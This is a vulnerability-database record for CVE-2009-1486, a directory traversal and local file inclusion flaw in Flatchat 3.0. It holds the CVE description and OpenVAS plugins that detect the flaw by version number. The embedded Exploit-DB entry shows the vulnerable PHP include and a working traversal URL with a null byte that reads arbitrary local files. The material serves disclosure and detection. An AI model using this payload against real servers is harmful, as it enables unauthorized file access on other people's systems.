ID CVE-2009-1486 Type cve Reporter cve@mitre.org Modified 2017-09-29T01:34:00
Description
Directory traversal vulnerability in pmscript.php in Flatchat 3.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the with parameter.
{"openvas": [{"lastseen": "2019-05-29T18:40:22", "bulletinFamily": "scanner", "description": "The host is running Flatchat and is prone to Directory Traversal\n vulnerability.", "modified": "2019-05-14T00:00:00", "published": "2009-05-18T00:00:00", "id": "OPENVAS:1361412562310800323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800323", "title": "Flatchat Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Flatchat Directory Traversal Vulnerability\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800323\");\n script_version(\"2019-05-14T12:12:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 12:12:41 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-05-18 09:37:31 +0200 (Mon, 18 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1486\");\n script_bugtraq_id(34734);\n script_name(\"Flatchat Directory Traversal Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34904\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8549\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_flatchat_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"flatchat/detected\");\n\n script_tag(name:\"impact\", value:\"Successful attacks can cause inclusion or execution of arbitrary\n local files in the context of the webserver process via directory traversal\n attacks and URL-encoded NULL-bytes.\");\n\n script_tag(name:\"affected\", value:\"Flatchat version 3.0 and prior.\");\n\n script_tag(name:\"insight\", value:\"Improper handling of user supplied input into the pmscript.php\n file via ..(dot dot) in 'with' parameter, can lead to directory traversal.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running Flatchat and is prone to Directory Traversal\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nflatchatPort = get_http_port(default:80);\n\nfcVer = get_kb_item(\"www/\" + flatchatPort + \"/Flatchat\");\nfcVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:fcVer);\n\nif(fcVer[1] != NULL)\n{\n if(version_is_less_equal(version:fcVer[1], test_version:\"3.0\")){\n security_message(flatchatPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:14:06", "bulletinFamily": "scanner", "description": "The host is running Flatchat and is prone to Directory Traversal\nvulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-05-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800323", "id": "OPENVAS:800323", "title": "Flatchat Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_flatchat_dir_trav_vuln.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Flatchat Directory Traversal Vulnerability\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks can cause inclusion or execution of arbitrary\nlocal files in the context of the webserver process via directory traversal\nattacks and URL-encoded NULL-bytes.\n\nImpact Level: Application\";\n\ntag_affected = \"Flatchat version 3.0 and prior\";\n\ntag_insight = \"Improper handling of user supplied input into the pmscript.php\nfile via ..(dot dot) in 'with' parameter, can lead to directory traversal.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"The host is running Flatchat and is prone to Directory Traversal\nvulnerability.\";\n\nif(description)\n{\n script_id(800323);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-18 09:37:31 +0200 (Mon, 18 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1486\");\n script_bugtraq_id(34734);\n script_name(\"Flatchat Directory Traversal Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34904\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8549\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_flatchat_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nflatchatPort = get_http_port(default:80);\nif(!flatchatPort){\n exit(0);\n}\n\nfcVer = get_kb_item(\"www/\" + flatchatPort + \"/Flatchat\");\nfcVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:fcVer);\n\nif(fcVer[1] != NULL)\n{\n if(version_is_less_equal(version:fcVer[1], test_version:\"3.0\")){\n security_message(flatchatPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:37:18", "bulletinFamily": "exploit", "description": "Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability. CVE-2009-1486. Webapps exploit for php platform", "modified": "2009-04-27T00:00:00", "published": "2009-04-27T00:00:00", "id": "EDB-ID:8549", "href": "https://www.exploit-db.com/exploits/8549/", "type": "exploitdb", "title": "Flatchat 3.0 pmscript.php with Local File Inclusion Vulnerability", "sourceData": "##########################################################################################\n[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability\n[+] Discovered By SirGod\n[+] www.mortal-team.net\n[+] www.h4cky0u.org\n##########################################################################################\n\n[+] Homepage : http://ninjadesigns.co.uk/\n\n[+] Local File Inclusion\n\n - Vulnerable code in pmscript.php\n\n--------------------------------------------\n$filename = 'users/'.$_GET['with'].'.php';\n\nif (file_exists($filename)) {\n include($filename);\n--------------------------------------------\n\n\n http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00\n\n##########################################################################################\n\n# milw0rm.com [2009-04-27]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8549/"}]}
